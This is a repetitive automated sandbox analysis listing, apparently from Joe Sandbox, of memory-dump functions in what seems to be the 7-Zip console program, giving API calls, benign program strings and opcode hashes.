                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                • String ID: FindFirstStreamW$FindNextStreamW$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 1646373207-4044117955
                                                                                                                                                                                                                                • Opcode ID: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                                                                                                                                                                                                                • Instruction ID: 0b5de85434db08832493908c58d1ce8c222c9dec2535b86158d6799d40af446c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac966f64d20482aa4fd5c134ec705327a834465029026a46f097207993e27cb5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6E07E78645A0691EA84DB51FAAC39423A5F769755F904035C82E03320EF3C825AC700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$memmove
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1534225298-0
                                                                                                                                                                                                                                • Opcode ID: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                                                                                                                                                                                                                • Instruction ID: cab6a0d0ff4427ed73ceb208f1f6475c1c0b45d99dcfa3742254ac5dbf6620c3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a041cbdb6f5740e4120ede61be48ff6f97309ac3af8f67b0fadf56b6372aeade
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F31AA62724E8143DB10EF26D49056D7721ABA6FE4B1C8223FFAE1B799CF39C4028750
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free$ErrorLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 408039514-0
                                                                                                                                                                                                                                • Opcode ID: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                                                                                                                                                                                • Instruction ID: 4ed92bf49c23b780adf62ea6353aab59dbcdcbd12f46a158bc8f1a3428166a08
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba39d191a4783be6191a4353f763b9374f22025bd81bbd69dc5c6e5eb5e84779
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D131B1232149848BCB30DF25E88026AB760F7D97A4F485126EB9E87B66DF39D855CB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: memcmp
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1475443563-0
                                                                                                                                                                                                                                • Opcode ID: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                                                                                                                                                                                • Instruction ID: 591c0579aeeeb229177000d882fd03951e5d79074bdd88848460a58cb4c5d8b3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41d9d86949f01cac63a720bc7b2bd3e9f688eab33a43bcd64fe82cf42b54a768
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9231BEB2328701A1EF04AF669C593E83361AB55FC8F825851DE0A96347EF74CAE5C304
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                                                                                                                                                                                • Instruction ID: fe550b74a41d3e62db3a00954944466c2b38c7db9872bddf7f5c3ef4f4059d9b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e90d6bb166ed15ba24e72fcfe06ac02a43145d9266722310fb98f001947c2363
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74012C6325A58085C611FB32E45666E6320F7E3B91F0850A3DF6E53712CF38D447C214
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                                                                                                                                                                                • Instruction ID: 54cfbe9d075850a80ac4837eda0f82ad4793ef74a5ba132e4cd3a4f0c3433279
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d9c09fb608b9bf2eac30e82356a3a9b3eaf7d7236c8fdec4e34535a6c9cfb299
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE01C96325658045CA11FF36E46176E6320EBE7B91F0990A3EF6E53721CF38D487C628
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                                                                                                                                                                                • Instruction ID: f004b11b99ccb02d8f65ed84a923dede1abc6a2103d9fb865be1bebf0f134f3c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0a25e55ccd52fa3f3baf4bdc67da172ff4df6f662b49c9aa123c0f49802e9bc
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C01DA637119848ACA10EF76DC911AC2330ABB6BA871C8572FF2D4B755DF30DC528364
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                                                • Instruction ID: f4c3600b2a581093f4e985c0ab5111a853831051daeac6bedb4ca78b28116002
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69bfdf775510731243c3de3a419cefae75036ebb294f2fdce68b442dc703e0d6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C011A636119808ACB10AE36DC911682730ABB6B98B1C8177FF2E4B755DF70D8428364
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021C91C
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021C9F1
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: memset.MSVCRT ref: 0021B20D
                                                                                                                                                                                                                                  • Part of subcall function 0021B1C8: fputs.MSVCRT ref: 0021B232
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D237E
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: fputs.MSVCRT ref: 001D23B8
                                                                                                                                                                                                                                  • Part of subcall function 001D2320: free.MSVCRT ref: 001D23C4
                                                                                                                                                                                                                                  • Part of subcall function 001D2300: fputc.MSVCRT ref: 001D2311
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 0021CADA
                                                                                                                                                                                                                                  • Part of subcall function 001D22E4: fflush.MSVCRT ref: 001D22EB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$free$fflushfputcmemset
                                                                                                                                                                                                                                • String ID: ERROR: $ERRORS:$WARNINGS:
                                                                                                                                                                                                                                • API String ID: 2975459029-4064182643
                                                                                                                                                                                                                                • Opcode ID: d2a1a2e72694af25cfe5264c7c3dc1886793622186513fdaa31e5f638f821b21
                                                                                                                                                                                                                                • Instruction ID: 4d0182c510cbb800f57e92d713907cafe06acb2f482defb4906e588c5ba94f8f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d2a1a2e72694af25cfe5264c7c3dc1886793622186513fdaa31e5f638f821b21
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86616E6A750686AACA39EF62E5913BE7351F774B80F584026DF6F07B01CF38D8A48350
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID: : $...$Junction: $REPARSE:
                                                                                                                                                                                                                                • API String ID: 1294909896-1476144188
                                                                                                                                                                                                                                • Opcode ID: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                                                                                                                • Instruction ID: 324a9a4fe159d0d4f7df4b453f5f8b0281ce098db53b58e7e199b0a5d10353db
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6483305c4f08a4f4140ab686dda4331553b33920a3cb9b28730788aac733e5f2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12512472220B05A6CF10DF25E84136AB761FBA07A4F84A023EE9747796DF7CC685CB50
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 00210E9C
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: free.MSVCRT ref: 001D33D7
                                                                                                                                                                                                                                  • Part of subcall function 001D339C: memmove.MSVCRT(00000000,?,?,00000000,001D10A8), ref: 001D33F2
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00210F5D
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00210FD8
                                                                                                                                                                                                                                • fputs.MSVCRT ref: 00210FF4
                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32 ref: 00211092
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputs$CriticalSection$EnterLeavefreememmove
                                                                                                                                                                                                                                • String ID: ???
                                                                                                                                                                                                                                • API String ID: 2578255354-1053719742
                                                                                                                                                                                                                                • Opcode ID: 78e2c2c692378c993afccde280bacb5edd97984081905a44e3e3f63d2506d652
                                                                                                                                                                                                                                • Instruction ID: 4c069cdc530dfc2e352f693ba38a667a932e43aaf26b971b2185fb99fe66668e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78e2c2c692378c993afccde280bacb5edd97984081905a44e3e3f63d2506d652
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88514D32320A81A2DA58DF26DA953ED6360F768B94F444526DF2D07764DF78D9FAC300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Would you like to replace the existing file:, xrefs: 00210CF0
                                                                                                                                                                                                                                • with the file from archive:, xrefs: 00210D1C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSectionfputs$EnterLeave
                                                                                                                                                                                                                                • String ID: Would you like to replace the existing file:$with the file from archive:
                                                                                                                                                                                                                                • API String ID: 3346953513-686978020
                                                                                                                                                                                                                                • Opcode ID: b3065acbe4c6a92e9f3db648331256e44102a71c550aec0345d61f355809c24a
                                                                                                                                                                                                                                • Instruction ID: 15b711f9f68e464d3e1e28ddd7a6b3ea1faabedc021875aeaaf3eb4cedf528b5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3065acbe4c6a92e9f3db648331256e44102a71c550aec0345d61f355809c24a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6341136237068291DA289F66E8C03E973A0F7A5B90F4482229F2D07350CFBCD8E8C704
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSectionfputs$EnterLeavefree
                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                • API String ID: 1989314732-3653984579
                                                                                                                                                                                                                                • Opcode ID: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
                                                                                                                                                                                                                                • Instruction ID: acf192ad0a0c8f18f1d91bb9ff587c9b96a35887a6f91d402a9ccfa430829278
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C312C72210A4581DB25DF25D8453DD2370F7A8FA8F585272EE6D4B7A8CF78C899C710
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • Enter password (will not be echoed):, xrefs: 0021CE69
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ConsoleMode$Handlefflushfputs
                                                                                                                                                                                                                                • String ID: Enter password (will not be echoed):
                                                                                                                                                                                                                                • API String ID: 108775803-3720017889
                                                                                                                                                                                                                                • Opcode ID: 36bd84e05aa982e1fa57c2f2cf585279101811381d58ea0075c40767b01f72a6
                                                                                                                                                                                                                                • Instruction ID: 3af5ed31cb5e8baf654c5492fb3d70631f696bfdd4c9bfe4cb26a3a4fa3c835f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36bd84e05aa982e1fa57c2f2cf585279101811381d58ea0075c40767b01f72a6
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3210A2635160242EE149F65E9153B923A1AB78BB0F385232EE2A477E4DF7CC8D6C300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: fputsfree
                                                                                                                                                                                                                                • String ID: Can not open the file$The archive is open with offset$The file is open$WARNING:
                                                                                                                                                                                                                                • API String ID: 2581285248-3393983761
                                                                                                                                                                                                                                • Opcode ID: 0c83fb30cb70f6a2b984ecfa0bcc3b2de66b99b3f440bfbea28bcb7ca7027a60
                                                                                                                                                                                                                                • Instruction ID: 1073221893fbc514b9d02fc2bc5b28d30d047c469b929c10cb87bac7196ad0d2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c83fb30cb70f6a2b984ecfa0bcc3b2de66b99b3f440bfbea28bcb7ca7027a60
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE218672314A4595CE20EF25E8503DD6760F7A9BE8F484222EF2E47765EF38C696C700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1d0000_7z.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                                                                • Opcode ID: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                                                                                                                                                                                • Instruction ID: d9ed1f524667c6b4f11cefa248035340aa1ab06e9f2aa5f975abd9d19b73b4e3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A71D12262C7C086CB20DF25E44069EB775F7DA790F648102EB9A43BAACF78D955DB00
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000B.00000002.2548980650.00000000001D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2548939717.00000000001D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549027420.000000000021F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549058003.000000000023C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 0000000B.00000002.2549084514.000000000023F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
